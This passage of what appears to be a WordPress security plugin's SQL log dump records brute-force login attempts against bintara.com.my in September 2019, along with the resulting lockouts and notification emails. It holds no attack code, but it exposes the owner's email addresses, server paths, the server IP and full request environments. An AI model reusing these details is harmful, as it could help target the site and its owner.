attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:24:41\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:24:41\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:39:41\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:39:41\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:24:42','2019-09-21 13:24:41',17886136,19291136,'https://bintara.com.my/test/wp-login.php',1,0,'149.202.95.126'),(25906,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:24:42','2019-09-21 13:24:41',18092008,19291136,'https://bintara.com.my/test/wp-login.php',1,0,'149.202.95.126'),(25907,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkvnkXpgmG5P@iB8kx5wAAAIQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.201.88\";s:11:\"REMOTE_PORT\";s:5:\"47761\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkvnkXpgmG5P@iB8kx5wAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072319.0778\";s:12:\"REQUEST_TIME\";s:10:\"1569072319\";}}','notice','2019-09-21 13:25:20','2019-09-21 13:25:19',17795616,19285400,'https://bintara.com.my/wp/wp-login.php',1,0,'149.202.201.88'),(25908,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:25:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:25:19\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:40:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:40:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:25:20','2019-09-21 13:25:19',17880496,19285400,'https://bintara.com.my/wp/wp-login.php',1,0,'149.202.201.88'),(25909,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:25:20','2019-09-21 13:25:19',18086392,19285400,'https://bintara.com.my/wp/wp-login.php',1,0,'149.202.201.88'),(25910,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkv3kXpgmG5P@iB8kx6QAAAIc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"166.62.32.32\";s:11:\"REMOTE_PORT\";s:5:\"43536\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkv3kXpgmG5P@iB8kx6QAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072319.7634\";s:12:\"REQUEST_TIME\";s:10:\"1569072319\";}}','notice','2019-09-21 13:25:21','2019-09-21 13:25:20',17800592,19290672,'https://bintara.com.my/blog/wp-login.php',1,0,'166.62.32.32'),(25911,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:25:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:25:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:40:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:40:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:25:21','2019-09-21 13:25:20',17885184,19290672,'https://bintara.com.my/blog/wp-login.php',1,0,'166.62.32.32'),(25912,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:25:21','2019-09-21 13:25:20',18091168,19290672,'https://bintara.com.my/blog/wp-login.php',1,0,'166.62.32.32'),(25913,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYk4HkXpgmG5P@iB8kx@gAAAJc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"74.208.47.8\";s:11:\"REMOTE_PORT\";s:5:\"41269\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYk4HkXpgmG5P@iB8kx@gAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072352.1735\";s:12:\"REQUEST_TIME\";s:10:\"1569072352\";}}','notice','2019-09-21 13:25:53','2019-09-21 13:25:52',17804440,19290824,'https://bintara.com.my/test/wp-login.php',1,0,'74.208.47.8'),(25914,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:25:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:25:52\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:40:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:40:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:25:53','2019-09-21 13:25:52',17888576,19290824,'https://bintara.com.my/test/wp-login.php',1,0,'74.208.47.8'),(25915,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:25:53','2019-09-21 13:25:52',18094528,19290824,'https://bintara.com.my/test/wp-login.php',1,0,'74.208.47.8'),(25916,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlKHkXpgmG5P@iB8kyJgAAAJE\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.177.25\";s:11:\"REMOTE_PORT\";s:5:\"53064\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlKHkXpgmG5P@iB8kyJgAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072425.0363\";s:12:\"REQUEST_TIME\";s:10:\"1569072425\";}}','notice','2019-09-21 13:27:06','2019-09-21 13:27:05',17798368,19284336,'https://bintara.com.my/wordpress/wp-login.php',1,0,'165.22.177.25'),(25917,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:27:05\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:27:05\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:42:05\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:42:05\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:27:06','2019-09-21 13:27:05',17882576,19284336,'https://bintara.com.my/wordpress/wp-login.php',1,0,'165.22.177.25'),(25918,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:27:06','2019-09-21 13:27:05',18088272,19284336,'https://bintara.com.my/wordpress/wp-login.php',1,0,'165.22.177.25'),(25919,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlR1iJ7D9Gn7wDPh8hTAAAAMo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"108.179.224.77\";s:11:\"REMOTE_PORT\";s:5:\"35942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlR1iJ7D9Gn7wDPh8hTAAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072455.1723\";s:12:\"REQUEST_TIME\";s:10:\"1569072455\";}}','notice','2019-09-21 13:27:36','2019-09-21 13:27:35',17805296,19292616,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.224.77'),(25920,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:27:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:27:35\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:42:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:42:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:27:36','2019-09-21 13:27:35',17889832,19292616,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.224.77'),(25921,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:27:36','2019-09-21 13:27:35',18096096,19292616,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.224.77'),(25922,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlSTDrcQxTmGrCWuaRPgAAAcg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.68.121\";s:11:\"REMOTE_PORT\";s:5:\"43586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_AD